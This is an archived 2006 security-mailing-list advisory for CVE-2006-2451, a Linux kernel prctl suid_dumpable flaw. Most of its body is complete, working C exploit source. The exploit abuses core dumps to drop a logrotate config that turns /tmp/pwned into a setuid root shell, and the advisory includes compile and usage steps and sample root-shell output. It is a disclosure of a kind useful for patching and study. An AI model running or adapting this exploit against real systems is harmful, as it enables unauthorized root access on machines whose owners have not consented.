The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[EXPL] Linux Local Root (Exploit)


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 19 Jul 2006 19:06:21 +0200
Subject: [EXPL] Linux Local Root (Exploit)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060720081214.6F45F5D36@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
X-Spam-Status: No, hits=2.281 tagged_above=2 required=5 tests=INFO_TLD,
 MSGID_FROM_MTA_ID
X-Spam-Level: **

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Linux Local Root (Exploit)
------------------------------------------------------------------------


SUMMARY

The suid_dumpable support in certain versions of the 
<http://www.kernel.org/>; Linux kernel allows a local user to cause a 
denial of service (disk consumption) attack. Also, the attacker can 
possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl 
function,A program that causes a core dump file to be created in a 
directory for which the user does not have permissions.

DETAILS

Vulnerable Systems:
 * Linux kernel version 2.6.13 to 2.6.17.4
 * Linux kernel version 2.6.16 to 2.6.16.24

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2451>; 
CVE-2006-2451

Exploit:
/*
 * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
 *
 * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info.>
 *
 * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
 * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a 
denial
 * of service (disk consumption) and POSSIBLY (yeah, sure;) gain 
privileges via
 * the PR_SET_DUMPABLE argument of the prctl function and a program that 
causes
 * a core dump file to be created in a directory for which the user does 
not
 * have permissions (CVE-2006-2451).
 *
 * This exploit uses the logrotate attack vector: of course, you must be 
able
 * to chdir() into the /etc/logrotate.d directory in order to exploit the
 * vulnerability. I've experimented a bit with other attack vectors as 
well,
 * with no luck: at (/var/spool/atjobs/) uses file name information to
 * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
 * permissions, xinetd (/etc/xinetd.d) puked out the crafted 
garbage-filled
 * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
 *
 * Thanks to Solar Designer for the interesting discussion on attack 
vectors.
 *
 * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
 *
 * Usage:
 * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
 * [exploit must be statically linked]
 * $ ./raptor_prctl2
 * [please wait until logrotate is run]
 * $ ls -l /tmp/pwned
 * -rwsr-xr-x  1 root users 7221 2006-07-18 13:32 /tmp/pwned
 * $ /tmp/pwned
 * sh-3.00# id
 * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
 * sh-3.00#
 * [don't forget to delete /tmp/pwned!]
 *
 * Vulnerable platforms:
 * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 
2.6.13-15.8-default]
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>

#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info.>"

char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n    daily\n    size=0\n    firstaction\n        chown 
root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f 
/var/log/core*\n    endscript\n}\n";

char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > 
/tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f 
/tmp/pwned.c";

int main(void)
{
 int   pid;
 struct rlimit  corelimit;
 struct stat st;

 /* print exploit information */
 fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

 /* prepare the setuid() helper */
 system(pwnage);

 /* set core size to unlimited */
 corelimit.rlim_cur = RLIM_INFINITY;
 corelimit.rlim_max = RLIM_INFINITY;
 setrlimit(RLIMIT_CORE, &corelimit);

 /* let's create a fake logfile in /var/log */
 if (!(pid = fork())) {
  chdir("/var/log");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);

 /* let's do the PR_SET_DUMPABLE magic */
 if (!(pid = fork())) {
  chdir("/etc/logrotate.d");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);

 /* did it work? */
 sleep(3);
 if ((stat("/var/log/core", &st) < 0) ||
     (stat("/etc/logrotate.d/core", &st) < 0)) {
  fprintf(stderr, "Error: Not vulnerable? See comments.\n");
  exit(1);
 }

 /* total pwnage */
 fprintf(stderr, "Please wait until logrotate is run and check 
/tmp/pwned;)\n");
 exit(0);
}


ADDITIONAL INFORMATION

The information has been provided by milw0rm.
The original article can be found at:
 <http://www.milw0rm.com/exploits/2031>; 
http://www.milw0rm.com/exploits/2031
 <http://www.0xdeadbeef.info/exploits/raptor_prctl.c>; 
http://www.0xdeadbeef.info/exploits/raptor_prctl.c




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру